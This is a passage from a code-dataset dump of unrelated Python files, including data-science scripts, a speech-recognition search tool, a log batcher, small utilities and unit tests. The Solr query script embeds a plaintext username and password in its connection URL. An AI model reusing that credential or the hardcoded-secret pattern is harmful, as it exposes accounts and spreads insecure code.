(i+j+1)*tau)\n func_to_integrate = lambda t_bar : np.abs(kernel(t_bar) * (x_integral(l_bound(t_bar),h_bound(t_bar))))\n \n int_f = quad(func_to_integrate,a,b,limit=200)[0]\n #int_f_squared = quad(lambda t_bar: (func_to_integrate(t_bar))**2,a,b)[0]\n \n #slice_matrix[i,j] = np.random.normal(int_f*mu,int_f_squared**0.5* sigma)\n slice_matrix[i,j] = cauchy.rvs(loc = 0, scale = cauchy_scale * int_f)\n #to double check this\n result = cumulative_and_diagonal_sums(slice_matrix)\n \n with open('cauchy_part.npy', 'wb') as f:\n np.save(f, result)\n \n \n \n \n \n","sub_path":"other scripts/kernel_weighted_trawls/no_t_kernel/cauchy/t_bar_kernel_updated.py","file_name":"t_bar_kernel_updated.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"240425304","text":"import pysolr\nimport codecs\nimport sys\nimport os\nfrom frame import *\nfrom tqdm import tqdm\n\ncodecs.register_error(\"strict\", codecs.replace_errors)\n\n\nfolder_name = \"avg_per_cat_res\"\n\ntry:\n\tos.mkdir(folder_name)\nexcept:\n\tpass\n\n\nparam = {\"debugQuery\":\"off\",\n\"rows\" : 0\n}\n\nsolr = pysolr.Solr(\"http://cezaryrj:SolrisNice1995@localhost:8983/solr/\" + sys.argv[1])\n\n\n\n\n\na = open(\"avg_participation_res/res_ppl.txt\",\"r\").readlines()\n\ncat = dict()\n\ni = 0\ny = 1\n\nwhile i < 50:\n\tcat[i] = []\n\n\twhile a[y] != \"\\n\":\n\t\tcat[i].append(a[y].strip())\n\t\ty = y + 1\n\n\ti = i + 1\n\ty = y + 2\n\n\nres = []\n\nfor x in cat.keys():\n\tprint(x)\n\tres.append(x)\n\tfor y in tqdm(cat[x]):\n\n\t\ttry:\n\n\t\t\tfound = solr.search(\"From-address:\" + y,**param).raw_response[\"response\"][\"numFound\"]\n\n\t\t\tif found == 0:\n\n\t\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\t\t\t\tres[x] = res[x] + found\n\n\t\t\telse:\n\n\t\t\t\tres[x] = res[x] + found\n\n\t\texcept:\n\n\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\n\t\t\tif found == 0:\n\n\t\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\t\t\t\tres[x] = res[x] + found\n\n\t\t\telse:\n\n\t\t\t\tres[x] = res[x] + found\n\n\n\n\tres[x] = res[x]/len(cat[x])\n\tprint(res[x])\ntmp = \"\"\n\ni = 0\nwhile i < len(res):\n\ttmp = tmp + (\"(\" + str(i) +\",\" + str(res[i]) + \")\")\n\ti = i + 1\n\n\nprint(tmp)\n","sub_path":"Raw repo/code/search/mw_query/avg_per_cat.py","file_name":"avg_per_cat.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264277820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 12:36:11 2021\n\n@author: GAYATHRI\n\"\"\"\nhungry=input(\"are you hungry\")\nif hungry==\"yes\":\n print(\"eat samosa\")\nelse:\n print(\"do your homework\")\n","sub_path":"hungry.py","file_name":"hungry.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176558729","text":"import speech_recognition as sr\r\nimport webbrowser as wb\r\nimport pyttsx3\r\nengine=pyttsx3.init()\r\nengine.setProperty('voice','HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech\\Voices\\Tokens\\TTS_MS_EN-US_ZIRA_11.0')\r\nchrome_path='C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\r\nwhile(1):\r\n \r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n r.adjust_for_ambient_noise(source)\r\n print('say something')\r\n audio=r.listen(source)\r\n print('done')\r\n\r\n try:\r\n text=r.recognize_google(audio)\r\n print('sexy thinks you said:\\n'+r.recognize_google(audio))\r\n lang='en'\r\n engine.say(text)\r\n engine.runAndWait()\r\n f_text=\"https://www.google.co.in/search?q=\"+text\r\n wb.get(chrome_path).open(f_text)\r\n except Exception as e:\r\n print(e)\r\n \r\n","sub_path":"speechrecognizer.py","file_name":"speechrecognizer.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522843441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 28 08:53:24 2018\r\n\r\n@author: JasonLeung\r\n\"\"\"\r\n\r\nimport urllib\r\nimport json\r\nimport pandas as pd\r\nhtml = urllib.request.urlopen('https://biendata.com/competition/kdd_2018_leaderboard_data/')\r\nhjson = json.loads(html.read())\r\nzdf = pd.DataFrame(hjson[1:])\r\ncolumns = hjson[0]['date'].copy()\r\ncolumns.append('team_name')\r\njsdf = zdf[columns]\r\njsdf.loc[:,hjson[0]['date']] = jsdf.loc[:,hjson[0]['date']].applymap(lambda x:round(float(x),5))\r\njsdf['zzdf'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).mean(),axis=1)\r\njsdf['zzdfsum'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).sum(),axis=1)\r\njsdf['zzdfmax'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).max(),axis=1)\r\njsdf.sort_values('zzdf',inplace = True)\r\njsdf = jsdf.reset_index()\r\njsdf.index = range(jsdf.shape[0])","sub_path":"Evaluation_related_code/get_leaderboard.py","file_name":"get_leaderboard.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275332561","text":"from elasticsearch import Elasticsearch\nimport json\nimport time\nimport logging\nimport socket\nfrom logging.handlers import SysLogHandler\n\nclass ContextFilter(logging.Filter):\n hostname = socket.gethostname()\n\n def filter(self, record):\n record.hostname = ContextFilter.hostname\n return True\n\nsyslog = SysLogHandler(address=('logs.papertrailapp.com', 38457))\nsyslog.addFilter(ContextFilter())\n\nformatter = logging.Formatter('%(asctime)s %(hostname)s LOG_BATCHER: %(message)s', datefmt='%b %d %H:%M:%S')\nsyslog.setFormatter(formatter)\n\nlogger = logging.getLogger()\nlogger.addHandler(syslog)\nlogger.setLevel(logging.INFO)\n\nes = Elasticsearch(['es'])\n\ndef tail(f):\n f.seek(0, 2)\n while True:\n line = f.readline()\n if not line:\n time.sleep(60)\n continue\n yield line\n\nlog = open('logs/visit_log.txt', 'r')\nfor visit in tail(log):\n try:\n logger.info({'user': int(visit.split(',')[0]), 'puzzle': int(visit.split(',')[1].rstrip())})\n es.update(index='puzzle_index', doc_type='puzzle', id=int(visit.split(',')[1].rstrip()) , body={'script': 'ctx._source.visits += 1'})\n except:\n logger.error({'user': visit.split(',')[0], 'puzzle': visit.split(',')[1]})\n","sub_path":"batch/log_batcher.py","file_name":"log_batcher.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243704221","text":"#!/usr/bin/env python\n\nimport csv\nimport json\nimport logging\nimport os\n\nfrom typing import Any, Dict, List\n\nfrom data.scrape.lib.codes import (\n LANGUAGES_PATH,\n PHONES_SUMMARY_PATH,\n PHONES_README_PATH,\n PHONES_DIRECTORY,\n)\n\n\ndef _wiki_name_and_transcription_level(ele: List[str]) -> str:\n return ele[3] + ele[4]\n\n\ndef _handle_wiki_name(\n language: Dict[str, Any], file_path: str, modifiers: List[str]\n) -> str:\n name = language[\"wiktionary_name\"]\n for modifier in modifiers:\n if modifier in language:\n key = file_path[\n file_path.index(\"_\") + 1 : file_path.rindex(\"_phone\")\n ]\n if not key:\n logging.info(\n \"Failed to isolate key for %r modifier in %r\",\n modifier,\n file_path,\n )\n continue\n values = language[modifier][key]\n if \"|\" in values:\n values = values.replace(\" |\", \",\")\n name += f\" ({values})\"\n return name\n\n\ndef main() -> None:\n with open(LANGUAGES_PATH, \"r\", encoding=\"utf-8\") as source:\n languages = json.load(source)\n readme_list = []\n languages_summary_list = []\n modifiers = [\"dialect\"]\n for file_path in os.listdir(PHONES_DIRECTORY):\n # Filters out README.md.\n if file_path.endswith(\".md\") or file_path.endswith(\"tsv\"):\n continue\n with open(\n f\"{PHONES_DIRECTORY}/{file_path}\", \"r\", encoding=\"utf-8\"\n ) as phone_list:\n # We exclude blank lines and comments.\n num_of_entries = sum(\n 1\n for line in phone_list\n if line.strip() and not line.startswith(\"#\")\n )\n iso639_code = file_path[: file_path.index(\"_\")]\n transcription_level = file_path[\n file_path.index(\"phone\") : file_path.index(\".\")\n ].capitalize()\n wiki_name = _handle_wiki_name(\n languages[iso639_code], file_path, modifiers\n )\n row = [\n iso639_code,\n languages[iso639_code][\"iso639_name\"],\n wiki_name,\n transcription_level,\n num_of_entries,\n ]\n languages_summary_list.append([file_path] + row)\n readme_list.append([f\"[phone]({file_path})\"] + row)\n # Sorts by Wiktionary language name, with phonemic entries before phonetic\n # ones.\n languages_summary_list.sort(key=_wiki_name_and_transcription_level)\n readme_list.sort(key=_wiki_name_and_transcription_level)\n with open(PHONES_SUMMARY_PATH, \"w\", encoding=\"utf-8\") as sink:\n tsv_writer_object = csv.writer(\n sink, delimiter=\"\\t\", lineterminator=\"\\n\"\n )\n tsv_writer_object.writerows(languages_summary_list)\n # Writes the README.\n with open(PHONES_README_PATH, \"w\", encoding=\"utf-8\") as sink:\n print(\n \"See the [HOWTO](HOWTO.md) for the steps to generate phone lists.\",\n file=sink,\n )\n print(\n \"| Link | ISO 639-2 Code | ISO 639 Language Name \"\n \"| Wiktionary Language Name \"\n \"| Phonetic/Phonemic | # of phones |\",\n file=sink,\n )\n print(\n \"| :---- | :----: | :----: | :----: | :----: | :----: |\",\n file=sink,\n )\n for link, code, iso_name, wiki_name, ph, count in readme_list:\n print(\n f\"| {link} | {code} | {iso_name} | {wiki_name} | {ph} \"\n f\"| {count:,} |\",\n file=sink,\n )\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(filename)s %(levelname)s: %(message)s\", level=\"INFO\"\n )\n main()\n","sub_path":"data/phones/lib/generate_phones_summary.py","file_name":"generate_phones_summary.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548627259","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n \n url(r'^$', 'dw_app.views.index', name='home'),\n url(r'^data/$', 'dw_app.views.get_data', name='data'),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"dw_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355418419","text":"import csv\nimport os.path\nimport numpy as np\nimport cv2 as cv\nfrom time import sleep\n\nimg = cv.imread('/home/kyleasti/Documents/ASTI/ftptest/PotekaOpenCVMapper/smallPoteka.jpg',1)\noverlay = img.copy()\noutput = img.copy()\nalpha = 0.05\n\n#stations = ['00173455','00173456','00173457','00173458','00173459','00174722','00174723','00174724','00174725','00174726','00174727','00174728','00174729','00174730','00174731','00174732','00174733','00174734','00174735','00181271','00181272','00181274','00181283','00181284','00181285','00181286','00181287','00181288','00181289','00181290','00181291','00181292']\nstations = {'00173456': {'location':'MMDA EFCOS', 'city':'Pasig City', 'xCoords':365,'yCoords':324},\n '00173457': {'location':'ASTI', 'city':'Quezon City', 'xCoords':339,'yCoords':239},\n '00173458': {'location':'Tapayan Pumping Station', 'city':'Rizal', 'xCoords':412,'yCoords':424},\n '00173459': {'location':'San Andres Pumping Station', 'city':'Manila', 'xCoords':226,'yCoords':350},\n '00174722': {'location':'De La Salle Araneta University', 'city':'Malabon','xCoords':211,'yCoords':198},\n '00174723': {'location':'MMDA Catmon', 'city':'Malabon', 'xCoords':139,'yCoords':199},\n '00174724': {'location':'Brgy. Elias Aldana', 'city':'Las Pinas', 'xCoords':181,'yCoords':538},\n '00174725': {'location':'Brgy. Punturin', 'city':'Valenzuela','xCoords':198,'yCoords':75},\n '00174726': {'location':'Las Pinas Science High School', 'city':'Las Pinas', 'xCoords':189,'yCoords':613},\n '00174727': {'location':'Brgy. Ugong', 'city':'Valenzuela', 'xCoords':229,'yCoords':116},\n '00174728': {'location':'MMDA Balut Pumping Station', 'city':'Manila', 'xCoords':162,'yCoords':269},\n '00174729': {'location':'CAAP', 'city':'Pasay','xCoords':223,'yCoords':471},\n '00174730': {'location':'DOST Compound', 'city':'Bicutan Taguig','xCoords':303,'yCoords':516},\n '00174731': {'location':'Brgy. Bagbaguin', 'city':'Valenzuela', 'xCoords':218,'yCoords':123},\n '00174732': {'location':'RED Training Center', 'city':'Pasig','xCoords':353,'yCoords':371},\n '00174733': {'location':'Dr. Filemon HS', 'city':'Las Pinas','xCoords':232,'yCoords':605},\n '00174734': {'location':'VCDRRMO Bldg', 'city':'Valenzuela', 'xCoords':161,'yCoords':158},\n '00174735': {'location':'PAGASA Science Garden', 'city':'Quezon City', 'xCoords':288,'yCoords':246},\n '00181271': {'location':'Quezon City High School', 'city':'Quezon City','xCoords':276,'yCoords':268},\n '00181272': {'location':'TUP Taguig', 'city':'Taguig','xCoords':276,'yCoords':482},\n '00181274': {'location':'E. Library, Technological College', 'city':'Pateros','xCoords':332,'yCoords':403},\n '00181283': {'location':'Bayanan Elementary School', 'city':'Muntinlupa','xCoords':304,'yCoords':651},\n '00181284': {'location':'C3 Bldg.', 'city':'Mandaluyong','xCoords':273,'yCoords':359},\n '00181285': {'location':'Xavier School', 'city':'San Juan','xCoords':283,'yCoords':315},\n '00181286': {'location':'Anabu 1-B', 'city':'Imus Cavite','xCoords':115,'yCoords':678},\n '00181287': {'location':'Unibersidad de Manila', 'city':'Manila', 'xCoords':185,'yCoords':334},\n '00181288': {'location':'Centennial Park', 'city':'Navotas', 'xCoords':129,'yCoords':234},\n '00181289': {'location':'MMDA Libertad PS', 'city':'Pasay', 'xCoords':196,'yCoords':418},\n '00181290': {'location':'RAVE Pasig City', 'city':'Pasig','xCoords':381,'yCoords':367},\n '00181291': {'location':'Greenheights Subdivision', 'city':'Paranaque','xCoords':247,'yCoords':545}}\n #'00181292': {'location':'Quezon City Science High School', 'city':'Quezon City', 'xCoords':266,'yCoords':219}}\n\n\n\nevents = {'000000':[]} #Dictionary for storing events in a single day\ndaysOfEvents = {}\npathString =\"/home/kyleasti/Documents/ASTI/ftptest/PotekaOpenCVMapper/P-Poteka Files/Jan 4 0843AM\"\n\ndayStart = 20200116\ndayEnd = 20200129\nnumberOfDays = dayEnd - dayStart\nprint(numberOfDays)\n\n\n#print(os.path.join(pathString,stations[0],'Plate'))\ndef convertMonth(month):\n if(month=='01'):\n return 'January'\n elif(month=='02'):\n return 'February'\n elif(month=='03'):\n return 'March'\n elif(month=='04'):\n return 'April'\n elif(month=='05'):\n return 'May'\n elif(month=='06'):\n return 'June'\n elif(month=='07'):\n return 'July' \n elif(month=='08'):\n return 'August'\n elif(month=='09'):\n return 'September'\n elif(month=='10'):\n return 'October'\n elif(month=='11'):\n return 'November' \n elif(month=='12'):\n return 'December'\n\ndef convertToHumanTime(strikeTime):\n year = strikeTime[1:5]\n month = convertMonth(strikeTime[5:7])\n day = strikeTime[7:9]\n hour = strikeTime[9:11]\n minute = strikeTime[11:13]\n second = strikeTime[13:15]\n finishedString = month+' '+day+' '+year+' '+hour+':'+minute+':'+second\n return(finishedString)\n\ndef retrieveStationsToDraw(events):\n listOfStations=[]\n for event in events:\n currentStation = event['stationID']\n if currentStation not in listOfStations:\n listOfStations.append(currentStation)\n return listOfStations\n\n\n\n\ndef rowToEventData(row):\n data = {'stationID':row[0],'datetime':row[3],'startTime':row[6],'endTime':row[7],'peakAtStart':row[8],'peakAtEnd':row[9],'gpsStatus':row[10]}\n return data\n\ndef pretty(d, indent=0):\n for key, value in d.items():\n print('\\t' * indent + str(key))\n if isinstance(value, dict):\n pretty(value, indent+1)\n else:\n print('\\t' * (indent+1) + str(value))\n\ndef draw_events(event,x,y,flags,param):\n \n if event == cv.EVENT_LBUTTONDBLCLK:\n for hr in range(24):\n stringHr=str(hr)\n if(hr<10): stringHr = '0'+stringHr\n for minute in range(60):\n stringMin=str(minute)\n if(minute<10): stringMin = '0'+stringMin\n for sec in range(60):\n stringSec = str(sec)\n if(sec<10): stringSec = '0'+stringSec\n currentDateTime=stringHr+stringMin+stringSec\n entireDateTime='\\''+daySelected+currentDateTime+'\\'' \n if currentDateTime not in events:\n None\n else:\n #print('at '+convertToHumanTime(entireDateTime)+ ' there were '+ str(len(events[currentDateTime])) +' events')\n stationsToDraw=retrieveStationsToDraw(events[currentDateTime])\n #print(str(retrieveStationsToDraw(events[currentDateTime])))\n for station in stationsToDraw:\n print(station)\n currentDict = stations.get(station)\n if 'eventCount' not in currentDict:\n currentDict['eventCount']=1\n else:\n currentDict['eventCount']+=1\n stationX=currentDict['xCoords']\n stationY=currentDict['yCoords']\n currentEventCount=currentDict['eventCount']\n print('Station has had '+ str(currentEventCount)+' number of events')\n #stationX=stations.get(station)['xCoords']\n #stationY=stations.get(station)['yCoords']\n if currentEventCount*2 < 255:\n cv.circle(overlay,(stationX,stationY),35,(0,165,currentEventCount*2),-1)\n else: cv.circle(overlay,(stationX,stationY),35,(0,165,255),-1)\n cv.putText(overlay, str(currentDict['eventCount']),(stationX-5, stationY+3), cv.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255), 2)\n cv.putText(overlay, str(currentDict['location']),(stationX-10, stationY+16), cv.FONT_HERSHEY_SIMPLEX, .3, (255, 255, 255), 1)\n cv.waitKey(50)\n\n\n \n \n cv.addWeighted(overlay, alpha, output, 1 - alpha,0, output)\n #cv.putText(output, convertToHumanTime(entireDateTime),(10, 30), cv.FONT_HERSHEY_SIMPLEX, .7, (0, 0, 255), 3)\n #cv.imshow('Output',output)\n cv.putText(output, convertToHumanTime(entireDateTime),(10, 30), cv.FONT_HERSHEY_SIMPLEX, .7, (255, 255, 255), 2)\n cv.imshow('Output',output)\n cv.waitKey(10)\n \n \n #print('sample of events list: ' + str(events[currentDateTime]))\n #print('x: '+str(x)+ ' y: '+str(y))\n\n\n\n\n#Agorithm for scanning CSV directories\nfor day in range(numberOfDays):\n daySelected = str(dayStart+day)\n for station in stations:\n directory=os.path.join(pathString,station,'Plate')\n print(directory)\n print(stations.get(station)['city'])\n for root,dirs,files in os.walk(directory):\n for file in files:\n if file.endswith(\".csv\"):\n if daySelected in file:\n fileDir = os.path.join(directory,file)\n with open(fileDir, 'r') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n line_count = 0\n cityStrike = stations.get(station)['city']\n for row in csv_reader:\n #print('Lightning Strike Happened at '+convertToHumanTime(repr(row[3]))+ ' near ' + station['city'] + ' at '+ station['location'])\n #print(rowToEventData(row))\n currentEvent = rowToEventData(row)\n currentTime = currentEvent['datetime'][8:14]\n #print('time is:' +currentTime)\n arr = []\n arr.append(currentEvent)\n if currentTime not in events:\n events[currentTime] = arr\n else: \n events[currentTime].append(currentEvent) #Append current lightning event to dictionary for date\n daysOfEvents[daySelected] = events #Append current date to group of days of events\n events = {'000000':[]} #reset event dictionary\nprint(str(daysOfEvents))\n\n #pretty(events)\n\n #print('Row0: ' +row[0]+' Row1: '+row[1]+' Row2: '+row[2]+' Row3: '+row[3]+' Row4: '+row[4]+ ' Row5: '+row[5]+ ' Row6: '+row[6]+ ' Row7: '+row[7]+ ' Row8: '+row[8]+ ' Row9: '+row[9]+ ' Row10: '+row[10]+ ' Row11: '+row[11])\n\nfor day in range(numberOfDays):\n daySelected = str(dayStart+day)\n print('Number of lightning events at '+ convertToHumanTime('\\''+daySelected+'000000\\'')+ ': ' +str(len(daysOfEvents[daySelected])))\n\n#for hr in range(24):\n# stringHr=str(hr)\n# if(hr<10): stringHr = '0'+stringHr\n# for minute in range(61):\n# stringMin=str(minute)\n# if(minute<10): stringMin = '0'+stringMin\n# for sec in range(61):\n# stringSec = str(sec)\n# if(sec<10): stringSec = '0'+stringSec\n# currentDateTime=stringHr+stringMin+stringSec\n# entireDateTime='\\''+daySelected+currentDateTime+'\\'' \n# if currentDateTime not in events:\n# None\n# else:\n #print('at '+convertToHumanTime(entireDateTime)+ ' there were '+ str(len(events[currentDateTime])) +' events')\n# print(str(retrieveStationsToDraw(events[currentDateTime])))\n #print('sample of events list: ' + str(events[currentDateTime]))\n# print(' ')\n\ncv.namedWindow('image')\n#cv.setMouseCallback('image',draw_events)\n\nwhile(1):\n cv.imshow('image',img)\n if cv.waitKey(20) & 0xFF == 27:\n break\ncv.destroyAllWindows()\n\n\n","sub_path":"lightningPeriod.py","file_name":"lightningPeriod.py","file_ext":"py","file_size_in_byte":12305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197112142","text":"from setuptools import setup, find_packages\nimport re\n\nwith open(\"tenkin/__init__.py\", encoding=\"utf8\") as f:\n version = re.search(r'__version__ = \"(.*?)\"', f.read()).group(1)\n\nsetup(\n name=\"Tenkin\",\n version=version,\n author=\"Luan Viana\",\n packages=find_packages(),\n package_data={'': [\n './static/html/index.html',\n './static/css/style.css',\n './static/js/main.js',\n './static/js/service-worker.js',\n './static/json/manifest.json',\n './static/python/main.py',\n './static/assets/favicon.ico',\n './static/assets/logo192.png',\n './static/assets/logo512.png',\n ]\n },\n include_package_data=True,\n install_requires=[\n \"click>=5.1\",\n \"uvicorn>=0.13.1\",\n \"beautifulsoup4>=4.9.3\",\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308149315","text":"for _ in range(int(input())):\n n,k,d = map(int, input().split())\n arr = list(map(int, input().split()))\n mem = {}\n for j in range(d):\n try:\n mem[arr[j]]+=1\n except:\n mem[arr[j]] = 1\n ans = len(mem.keys())\n temp = ans\n i = 0\n j = d\n\n while(j<n):\n if arr[j] in mem:\n if mem[arr[j]]==0:\n temp+=1\n mem[arr[j]]+=1\n else:\n mem[arr[j]] = 1\n temp+=1\n mem[arr[i]]-=1\n if mem[arr[i]]==0:\n temp-=1\n ans = min(ans,temp)\n j+=1\n i+=1\n print(ans) \n \n","sub_path":"codeforces/1247/B1.py","file_name":"B1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412585096","text":"import io\nimport builtins\n\nfrom unittest.mock import patch\nfrom unittest.mock import MagicMock\n\nfrom mt_shared import mt_io\n\n\ndef test_read_file_non_user_expand():\n\n file_name = '/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.read_file(file_name)\n\n mock.assert_called_with(file_name, 'r')\n\n\n@patch('mt_shared.mt_io.os.path.expanduser')\ndef test_read_file_with_user_expand(mock_expand):\n\n file_name = '~/file_name.txt'\n expanded_file_name = '/full/expanded/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_content.read = MagicMock()\n mock_expand.return_value = expanded_file_name\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.read_file(file_name)\n\n mock.assert_called_with(expanded_file_name, 'r')\n mock_content.read.assert_called_once()\n\n\n@patch('mt_shared.mt_io.os')\ndef test_write_file_non_user_expand(mock_os):\n\n data = 'data 2 write'\n file_name = '/path/2/file_name.txt'\n mock_stream = io.StringIO('some text')\n mock_stream.write = MagicMock()\n\n mock = MagicMock(return_value=mock_stream)\n with patch('builtins.open', mock):\n mt_io.write_file(file_name, data)\n\n mock.assert_called_with(file_name, 'w')\n mock_stream.write.assert_called_with(data)\n\n\n@patch('mt_shared.mt_io.os')\ndef test_write_file_with_user_expand(mock_os):\n\n file_name = '~/file_name.txt'\n data = 'data to write to the file'\n expanded_file_name = '/full/expanded/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_os.path.expanduser.return_value = expanded_file_name\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.write_file(file_name, data)\n\n mock.assert_called_with(expanded_file_name, 'w')\n\n\n@patch('mt_shared.mt_io.os')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_write_file_writes_directory(mock_gfn, mock_os):\n\n full_fn = '/Usr/whatever/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_gfn.return_value = full_fn\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.write_file('~/file_name.txt', 'data')\n\n dirname = mock_os.path.dirname.return_value\n mock_os.path.dirname.assert_called_with(full_fn)\n mock_os.makedirs.assert_called_with(dirname, exist_ok=True)\n\n@patch('mt_shared.mt_io.os.path.isfile')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_exists(mock_gfn, mock_isfile):\n\n file_name = 'full/path/to/file.txt'\n is_file_result = 'YES IT IS DA FILE'\n mock_isfile.return_value = is_file_result\n\n result = mt_io.exists(file_name)\n\n assert result == is_file_result\n\n\n@patch('mt_shared.mt_io.os.path.isfile')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_exists_expands_path(mock_gfn, mock_isfile):\n\n file_name = 'full/path/to/file.txt'\n is_file_result = 'YES IT IS DA FILE'\n mock_isfile.return_value = is_file_result\n\n result = mt_io.exists(file_name)\n\n mock_isfile.assert_called_with(mock_gfn.return_value)\n\n\n\n\n\n\n","sub_path":"mt-shared/tests/test_mt_io.py","file_name":"test_mt_io.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162912558","text":"import sys\n# PATH = \"/home/simon/Documents/NAIVI/\"\nPATH = \"/home/simfont/NAIVI/\"\nsys.path.append(PATH)\nimport numpy as np\nimport torch\nfrom sims_mcmc.main import main\n\nimport os\nos.environ[\"XDG_CACHE_HOME\"] = \"/home/simfont/scratch/.cache/\"\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n which = int(sys.argv[1])\n seed = np.array([which % 10])\n ps = np.array([[0, 50][which // 10]])\n name = f\"mcmc_1000_{which}\"\n else: # no argument = run all\n seed = np.arange(0, 10, 1)\n ps = np.array([0, 50])\n name = \"mcmc_1000_all\"\n print(seed, ps)\n torch.set_default_dtype(torch.float64)\n main(\n path=PATH + \"sims_mcmc/\",\n name=name,\n explore_dict={\n \"data.N\": np.array([1000]),\n \"data.K\": np.array([2]),\n \"data.p_bin\": np.array([0]),\n \"data.p_cts\": ps,\n \"data.missing_mean\": np.array([-10000.]),\n \"data.seed\": seed,\n \"data.alpha_mean\": np.array([-1.85]),\n \"data.mnar_sparsity\": np.array([0.0]),\n \"fit.algo\": [\"MCMC\"],\n \"fit.n_sample\": np.array([0]),\n \"fit.mcmc_n_sample\": np.array([1000]),\n \"model.alpha_mean\": np.array([-1.85]),\n \"model.K\": np.array([2]),\n \"model.mnar\": [False]\n }\n )\n","sub_path":"sims_mcmc/job_mcmc_1000.py","file_name":"job_mcmc_1000.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564934136","text":"# This file is part of the MapProxy project.\n# Copyright (C) 2011 Omniscale <http://omniscale.de>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import with_statement\n\nimport os\nimport tempfile\n\nfrom lxml import etree, html\nfrom nose.tools import eq_\n\nfrom mapproxy.featureinfo import (combined_inputs, XSLTransformer,\n XMLFeatureInfoDoc, HTMLFeatureInfoDoc)\nfrom mapproxy.test.helper import strip_whitespace\n\ndef test_combined_inputs():\n foo = '<a><b>foo</b></a>'\n bar = '<a><b>bar</b></a>'\n\n result = combined_inputs([foo, bar])\n result = etree.tostring(result)\n eq_(result, b'<a><b>foo</b><b>bar</b></a>')\n\n\nclass TestXSLTransformer(object):\n def setup(self):\n fd_, self.xsl_script = tempfile.mkstemp('.xsl')\n xsl = b\"\"\"\n <xsl:stylesheet version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n <xsl:template match=\"/\">\n <root>\n <xsl:apply-templates select='/a/b'/>\n </root>\n </xsl:template>\n <xsl:template match=\"/a/b\">\n <foo><xsl:value-of select=\"text()\" /></foo>\n </xsl:template>\n </xsl:stylesheet>\"\"\".strip()\n open(self.xsl_script, 'wb').write(xsl)\n\n def teardown(self):\n os.remove(self.xsl_script)\n\n def test_transformer(self):\n t = XSLTransformer(self.xsl_script)\n doc = t.transform(XMLFeatureInfoDoc('<a><b>Text</b></a>'))\n eq_(strip_whitespace(doc.as_string()), b'<root><foo>Text</foo></root>')\n\n def test_multiple(self):\n t = 